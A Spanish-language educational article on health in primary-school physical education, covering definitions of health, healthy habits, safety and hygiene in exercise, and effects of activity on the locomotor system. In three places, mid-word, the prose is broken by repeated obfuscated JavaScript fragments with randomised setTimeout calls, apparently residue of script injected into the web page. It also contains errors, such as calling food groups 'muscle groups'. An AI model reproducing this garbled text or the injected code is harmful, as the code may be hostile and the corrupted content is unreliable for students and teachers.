LA SALUD EN EL ÁREA DE EDUCACIÓN FÍSICA

Autora: Ana María Rangel Berrocal

INTRODUCCIÓN

          El área de Educación Física está íntimamente ligada al concepto de salud, ya que desde esta área se pretende la adquisición de hábitos saludables, como podría ser el gusto por la actividad física, el desarrollo de relaciones sociales que repercuten obviamente en el desarrollo psicosocial del alumnado, la mejora de diversos órganos cardiovasculares, respiratorios o locomotrices. Además, el Real Decreto 1513/2006, de 7 de diciembre por el cual se establecen las enseñanzas mínimas en el área de Educación Física y el Decreto 82/2007 del 24 de Abril por el que se establecen las enseñanzas de Educación Primaria en Extremadura, tiene como uno de sus contenidos la Actividad física y salud. Este contenido nos habla de los conocimientos que son necesarios que adquieran nuestros alumnos, para que la actividad física sea saludable.


 

DEFINICIÓN DE SALUD

         Con el fin de comprender el concepto de salud nos basaremos en las definiciones de diferentes autores. Entre las muchas definiciones de salud que existen, vamos a destacar las siguientes:


        La OMS (Organización Mundial de la Salud):    En su carta Magna en 1946, definió la salud: “Es el estado de completo bienestar físico, social y mental y no sólo como la ausencia de afecciones o enfermedades”.


         TERRIS (1980): No está de acuerdo con la definición de la OMS. Él propone: “Es un estado de bienestar físico, social y mental, con capacidad de funcionamiento y no sólo como la ausencia de afecciones o enfermedades.”


       Diccionario de la Real Academia Española:  Por último, el Diccionario de la Real Academia Española, define la salud como: “Es el estado en el que el ser orgánico ejerce normalmente sus funciones”.


 

EDUCACIÓN FÍSICA Y SALUD: 

-        Según Mike Sleap (1990), existen 4 grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes razones que  indican la conveniencia, de un enfoque dirigido hacia la salud en la EF en la etapa de la Ed. Primaria. 

1.Contribuye al Crecimiento y Desarrollo.


         La EF contribuye a un crecimiento y desarrollo en los niños/as. Desde adquirir un desarrollo más armónico del cuerpo, a corregir malos hábitos posturales, conocer normas de seguridad etc.


2.Contribuye a adquirir nuevas Experiencias.


          Se aprenden gestos nuevos, socialización entre compañeros, conoce normas y reglas, se conoce el funcionamiento de su cuerpo, etc. Aspectos importantes para un desarrollo personal.


 3.Es para toda la vida.


         El ejercicio físico es para toda la vida y estos hábitos se potencian desde la infancia. Desde la EF creamos actividades que al alumno le gustan y fomentamos el ejercicio en el ocio y tiempo libre, lo cual hace que sea para toda la vida.


4.Actúa como Medio Preventivo.


         El ejercicio físico actúa como medio preventivo de accidentes cardiovasculares. Además, favorece que aspectos como el sedentarismo, obesidad o tabaquismos se reduzcan o eliminen con la práctica de ejercicio.


 

HÁBITOS A LOS QUE DEBEMOS ACOSTUMBRAR A LOS ALUMNOS/AS. SEGURIDAD E HIGIENE EL LA ACTIVIDAD FÍSICA: 

1.Hábitos Alimenticios:

          Los alumnos deben seguir una alimentación sana y equilibrada para lograr un adecuado desarrollo y crecimiento corporal, prevenir enfermedades como la obesidad, anorexia, enfermedades cardiovasculares etc. Esta alimentación deberá contener glúcidos, lípidos, vitaminas, proteínas, hidratos de carbono, sales minerales, agua. Los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes grupos musculares son fruta – leche –carne –pescado –huevo –verdura.


 

2.Hábitos de Higiene:

  • Cuidado Personal: Ducha diaria, lavado de manos, dientes, oídos. Lavarse-cambiarse en Educación Física.
  • Vestimenta: Cambio diario de ropa interior, limpieza de ropa, sábanas limpias semanales…
  • Higiene en el medio: Conservación del medio ambiente, servicios públicos etc.

 

3.Hábitos de Descanso:

          Conviene descansar a lo largo del día sin que sea solo dormir. Por ejemplo relajarse. Debemos educar unos ritmos de vida distintos al de la sociedad actual, para que los alumnos no padezcan estrés. Ej: Acostarse temprano, protegerse de ruidos etc.


 

4.Hábitos de Ejercicio Físico:

          Conviene realizar ejercicio físico en el tiempo libre ya que aumenta la salud y calidad de vida, la condición física, compensa al ritmo de vida.


 

5.Hábitos Sociales:

          El alumno deberá aprender que hay ciertos roles sociales que perjudican gravemente la salud y calidad de vida como es el alcohol, tabaco, drogas. También es importante informar sobre las enfermedades de transmisión sexual, sobre todo en el 3º ciclo, como paso a la adolescencia.


 

6.Hábitos de Prevención y de Seguridad e higiene en la actividad física:

         Para llevar a cabo una EF saludable sin perjuicios negativos en nuestro organismo hemos de tener en cuenta varios aspectos importantes como: 

  • Seguridad e higiene en el medio: El lugar donde se vaya hacer EF tiene que estar en perfectas condiciones. Limpio, sin obstáculos, pista sin irregularidades, que no esté mojado etc.
  • El material: Debe estar en buen estado, y sobre todo adaptado a las características del alumno y de la tarea.
  • La vestimenta: La adecuada para realiza ejercicio, chándal, zapatillas, ropa a ser posible de algodón, hilo, lino evitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las prendas poliéster ya que dificultan la transpiración. Llevar ropa de aseo para el cambio de la ropa sudada.
  • El calentamiento y la vuelta a la calma (Relajación): Son elementos imprescindibles en toda actividad física, ya que ayuda a poner en condiciones adecuadas al organismo para la actividad, nos ayuda a evitar ciertas lesiones musculares, articulares etc. La vuelta a la calma nos ayuda para recuperar la normalidad de nuestro organismo, por eso son aspectos de relajación.
  • El aseo: En la clase de Educación Física, hemos de dejar al final un tiempo para asearse y cambiarse d ropa. Hemos de saber trasladar al alumno esta importancia de salud e higiene.
  • Otros aspectos:   Tener en cuenta: Características individuales,  no realizar competiciones, no realizar ejercicios específicos etc. Otro aspecto de prevención es el “Examen Médico Anual”, además es importante que el maestro de EF contenga también el informe médico de los alumnos.

 

EFECTOS SALUDABLES DE LA ACTIVIDAD FÍSICA EN LOS DIFERENTES ÓRGANOS Y SISTEMAS: 

-        Vamos a analizar cómo la actividad física influye en la salud: 

1.-SOBRE EL APARATO LOCOMOTOR. 

1. Aumento de la masa muscular (mayor fuerza).


2. Aumento del volumen de tendones y ligamentos (mayor fuerza tensional).


3. Aumento de la coordinación y movilidad articular.


4. Retraso de la fatiga muscular.


5. Fortalecimiento de la estructura ósea.


6. Evita la atrofia y la obesidad.